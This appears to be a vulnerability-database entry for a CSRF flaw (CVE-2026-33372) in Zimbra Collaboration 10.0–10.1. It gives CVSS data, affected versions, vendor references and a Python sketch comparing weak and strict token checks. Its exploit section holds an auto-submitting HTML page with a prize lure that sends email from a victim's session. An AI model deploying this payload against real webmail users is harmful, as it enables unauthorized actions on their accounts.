Security Vulnerability Report
CVE-2026-33372 CVSS 5.4 MEDIUM

CVE-2026-33372

Published: 2026-03-20 14:16:16
Last Modified: 2026-04-01 15:32:51

Description

An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. A cross-site request forgery (CSRF) vulnerability exists in Zimbra Webmail due to improper validation of CSRF tokens. The application accepts CSRF tokens supplied within the request body instead of requiring them through the expected request header. An attacker can exploit this issue by tricking an authenticated user into submitting a crafted request. This may allow unauthorized actions to be performed on behalf of the victim.
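The header-versus-body distinction in the description is the whole bug. The following Python, added here and not part of the advisory or of Zimbra's code, models the weak validation beside a hardened one; the Request class, the X-CSRF-Token header name and the csrf_token form field are assumptions for illustration.

```python
import hmac


class Request:
    """Constructed stand-in for an HTTP request (assumption, not Zimbra's request object).
    session_token is the CSRF token the server issued to the authenticated session."""

    def __init__(self, headers=None, form=None, session_token=None):
        self.headers = {k.lower(): v for k, v in (headers or {}).items()}
        self.form = form or {}
        self.session_token = session_token


def _matches(token, expected):
    # Constant-time comparison; refuse when either side is missing.
    return token is not None and expected is not None and hmac.compare_digest(token, expected)


def weak_csrf_check(req):
    """Pattern described by CVE-2026-33372: the token is also accepted from the request
    body. A cross-site <form> controls every body field, so the body path gives the
    token no cross-origin guarantee at all."""
    token = req.headers.get("x-csrf-token") or req.form.get("csrf_token")
    return _matches(token, req.session_token)


def strict_csrf_check(req):
    """Hardened: the token is read only from a custom header. Browsers never attach
    custom headers to a cross-site form post, and fetch/XHR cannot add one without a
    CORS preflight that the server does not grant."""
    # Defence in depth: modern browsers label cross-site navigations and submissions.
    if req.headers.get("sec-fetch-site") == "cross-site":
        return False
    return _matches(req.headers.get("x-csrf-token"), req.session_token)


if __name__ == "__main__":
    tok = "9f1c2d7a4b8e3c6d0a5f7e1b2c4d6e8f"  # constructed session token
    same_origin = Request(headers={"X-CSRF-Token": tok}, session_token=tok)
    # What a hostile page's auto-submitted form produces: body fields, no custom header.
    cross_site = Request(form={"csrf_token": tok, "action": "send_email"},
                         headers={"Sec-Fetch-Site": "cross-site"}, session_token=tok)
    print("same-origin weak:", weak_csrf_check(same_origin), "strict:", strict_csrf_check(same_origin))
    print("cross-site  weak:", weak_csrf_check(cross_site), "strict:", strict_csrf_check(cross_site))
```

The weak check passes the cross-site request because the body token matches; the strict check rejects it both for the missing header and for the Sec-Fetch-Site label.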

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - VULNERABLE
Zimbra Collaboration (ZCS) 10.0
Zimbra Collaboration (ZCS) 10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-33372: Zimbra Collaboration CSRF
     Description: Exploits the vulnerability where the CSRF token is accepted in the request body.
     Usage: Host this file on a server and trick an authenticated Zimbra user to visit it. -->
<html>
<body>
<h2>Zimbra CSRF Exploit</h2>
<form action="https://target-zimbra-domain.com/service/soap/SendMsgRequest" method="POST">
  <!-- The vulnerable application accepts the token in the body -->
  <input type="hidden" name="csrf_token" value="VALID_TOKEN_FROM_USER_SESSION" />
  <input type="hidden" name="action" value="send_email" />
  <input type="hidden" name="to" value="[email protected]" />
  <input type="hidden" name="subject" value="CSRF Test" />
  <input type="hidden" name="content" value="This email was sent via CSRF." />
  <input type="submit" value="Click me to win a prize!" />
</form>
<script>
  // Auto-submit the form on load
  document.forms[0].submit();
</script>
</body>
</html>

References

https://wiki.zimbra.com/wiki/Security_Center (Vendor Advisory, Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes (Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy (Product)
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories (Vendor Advisory)

Record Data

Source identifier: [email protected]
Published: 2026-03-20T14:16:16.357
Last Modified: 2026-04-01T15:32:50.733
Status: Analyzed
Weakness: CWE-352 (source 134c704f-9b21-4f2e-91b3-4a467353bcc0, Secondary)
CVSS 3.1 (Secondary, same source): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N, base score 5.4 MEDIUM, exploitability score 2.8, impact score 2.5
Affected CPE: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*, versionStartIncluding 10.0.0, versionEndExcluding 10.1.16 (matchCriteriaId E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0)